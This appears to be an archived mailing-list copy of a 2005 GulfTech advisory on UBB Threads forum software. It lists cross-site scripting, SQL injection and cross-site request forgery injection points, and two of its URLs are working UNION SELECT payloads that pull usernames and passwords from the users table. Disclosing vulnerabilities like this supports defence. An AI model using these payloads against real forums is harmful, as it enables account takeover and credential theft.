Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | Infopop UBB Threads Multiple Vulnerabilities |
|---|---|
| Date: | Thu, 23 Jun 2005 23:26:51 -0500 |
########################################################## # GulfTech Security Research June 23rd, 2005 ########################################################## # Vendor : Infopop Corporation # URL : http://www.ubbcentral.com/ubbthreads/ # Version : All Versions Prior To 6.5.2 Beta # Risk : Multiple Vulnerabilities ##########################################################
Description: UBB Threads is a very popular forum system developed by Infopop. There are a number of vulnerabilities in UBB Threads that may allow an attacker to execute cross site scripting, http response splitting, and cross site request forgery attacks. Also, an attacker may include, execute, or read arbitrary local files. These vulnerabilities may allow for an attacker to completely compromise an installation of UBB Threads and possibly more. Users are encouraged to upgrade as soon as possible to the latest UBB Threads release.
Cross Site Scripting: There are a large number of cross site scripting issues in UBB Threads. Due to the large number the examples I will simply put a [XSS] where an attacker might place offending code. Some examples might look like this.
http://ubbt/dosearch.php?Cat=0&Searchpage=2[XSS]&topic= http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818[XSS]&page=0&what=showflat&fpart=1&vc=1 http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0&what=showflat[XSS]&fpart=1&vc=1 http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0[XSS]&what=showflat&fpart=1&vc=1 http://ubbt/showprofile.php?Cat=0&User=7&Number=39818[XSS]&Board=UBB8&what=showflat&page=0&fpart=1&vc=1 http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8[XSS]&what=showflat&page=0&fpart=1&vc=1 http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8&what=showflat[XSS]&page=0&fpart=1&vc=1 http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0&fpart=all[XSS] http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0[XSS]&fpart=all http://ubbt/showmembers.php?Cat=&like=p[XSS]&sb=1&page=1
These vulnerabilities can be used to steal sensitive information from a user, and possibly lead to malicious code execution in the context of the victims browser.
http://ubbt/download.php?Number=42227[SQL] http://ubbt/calendar.php?Cat=7&month=6&year=2005[SQL] http://ubbt/calendar.php?Cat=&month=7[SQL]&year=2005 http://ubbt/modifypost.phpCat=0&Username=foobar&Number= [SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup &Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1& preview=1&peditdelete=Delete+this+post
http://ubbt/mailthread.php?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username ,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1& fpart=1&what=showflat
http://ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password, 0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received
http://ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page= 0&vc=1&fpart=1&what=showflat http://ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded http://ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]
http://ubbt/addaddress.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1 http://ubbt/toggleignore.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1 http://ubbt/removeignore.php?Cat=&User=123 http://ubbt/removeaddress.php?Cat=&User=123
http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351
Related Info: The original advisory can be found at the following location http://www.gulftech.org/?node=research&article_id=00084-06232005
Credits: James Bercegay of the GulfTech Security Research Team
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | TSLSA-2005-0030 - multi, Trustix Security Advisor |
|---|---|
| Next by Date: | Re: how to exploit SQL INJECTION?, Pablo Escobar |
| Previous by Thread: | TSLSA-2005-0030 - multi, Trustix Security Advisor |
| Next by Thread: | MDKSA-2005:104 - Updated squid packages fix vulnerability, Mandriva Security Team |
| Indexes: | [Date] [Thread] [Top] [All Lists] |